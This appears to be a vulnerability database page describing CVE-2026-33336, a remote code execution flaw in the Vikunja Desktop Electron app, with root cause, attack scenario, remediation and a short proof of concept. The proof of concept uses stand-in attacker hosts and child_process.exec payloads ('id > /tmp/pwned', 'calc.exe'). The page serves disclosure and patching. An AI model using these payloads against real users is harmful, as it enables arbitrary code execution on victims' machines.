Skip to main content

Node.js EUVDEUVD-2026-14911

| CVE-2026-33336 MEDIUM
Code Injection (CWE-94)
2026-03-24 GitHub_M
6.5
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
6.5 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

4
Patch available
Apr 16, 2026 - 05:29 EUVD
2.2.0
EUVD ID Assigned
Mar 24, 2026 - 15:45 euvd
EUVD-2026-14911
Analysis Generated
Mar 24, 2026 - 15:45 vuln.today
CVE Published
Mar 24, 2026 - 15:16 nvd
MEDIUM 6.5

DescriptionGitHub Advisory

Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables nodeIntegration in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.

Root cause

Two misconfigurations combine to create this vulnerability:

  1. nodeIntegration: true is set in BrowserWindow web preferences (desktop/main.js:14-16), giving any page loaded in the renderer full access to Node.js APIs (require, child_process, fs, etc.).
  2. No will-navigate or will-redirect handler is registered on the webContents. The existing setWindowOpenHandler (desktop/main.js:19-23) only intercepts window.open() calls (new-window requests). It does not intercept same-window navigations triggered by:
  • <a href="https://..."> links (without target="_blank")
  • window.location assignments
  • HTTP redirects
  • <meta http-equiv="refresh"> tags

Attack scenario

  1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
  2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: <a href="https://evil.example/exploit">Click here for the updated design spec</a>
  3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: frontend/src/views/project/ProjectInfo.vue uses v-html with DOMPurify-sanitized output.
  4. The victim uses Vikunja Desktop and clicks the link.
  5. Because no will-navigate handler exists, the BrowserWindow navigates to https://evil.example/exploit in the same renderer process.
  6. The attacker's page now executes in a context with nodeIntegration: true and runs: require('child_process').exec('id > /tmp/pwned');
  7. Arbitrary commands execute as the victim's OS user.

Impact

Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.

Proof of concept

  1. Set up a Vikunja instance with two users sharing a project.
  2. As the attacker user, edit a project description to include: <a href="https://attacker.example/poc.html">Meeting notes</a>
  3. Host poc.html with: <script>require('child_process').exec('calc.exe')</script>
  4. As the victim, open the project in Vikunja Desktop and click the link.
  5. calc.exe (or any other command) executes on the victim's machine.

Credits

This vulnerability was found using GitHub Security Lab Taskflows.

AnalysisAI

Vikunja Desktop (Electron wrapper) versions 0.21.0 through 2.1.x contain a critical remote code execution vulnerability caused by enabled Node.js integration combined with missing navigation controls. An attacker who is a legitimate user on a shared Vikunja instance can inject a malicious hyperlink into user-generated content (task descriptions, comments, project descriptions) that, when clicked by a victim using Vikunja Desktop, causes arbitrary code execution with the victim's OS user privileges. A proof-of-concept demonstrating command execution via a simple HTML link has been documented, and the vulnerability affects all Desktop users on affected versions.

Technical ContextAI

Vikunja is an open-source task management platform distributed via cpe:2.3:a:go-vikunja:vikunja with both server and Electron-based Desktop components. The vulnerability stems from two misconfigurations in the Electron main process (desktop/main.js): enablement of nodeIntegration: true in BrowserWindow web preferences grants full Node.js API access (require, child_process, fs) to any JavaScript executing in the renderer, and absence of a will-navigate or will-redirect event handler allows same-window navigations to attacker-controlled origins. The existing setWindowOpenHandler only intercepts window.open() calls (new-window requests), not standard anchor tag navigation, HTTP redirects, or meta refresh directives. This combination violates the principle of least privilege and represents a CWE-94 (Improper Control of Generation of Code) vulnerability where untrusted input (user-controlled links) can trigger execution of Node.js code in a privileged context.

RemediationAI

Immediately upgrade Vikunja Desktop to version 2.2.0 or later, which disables nodeIntegration and implements will-navigate event handlers to restrict same-window navigations. Users unable to upgrade immediately should avoid clicking links within task descriptions, comments, and project descriptions from untrusted sources, and should disable Desktop application use in favor of the web interface until patching is complete. Organization administrators should enforce automatic updates for Vikunja Desktop via endpoint management tools and audit user accounts for suspicious activity, as the vulnerability allows any authenticated user to trigger code execution. For long-term hardening, review Electron application security best practices in the official Electron documentation (https://www.electronjs.org/docs/tutorial/security) and consider network segmentation to limit the impact of a compromised endpoint.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Share

EUVD-2026-14911 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy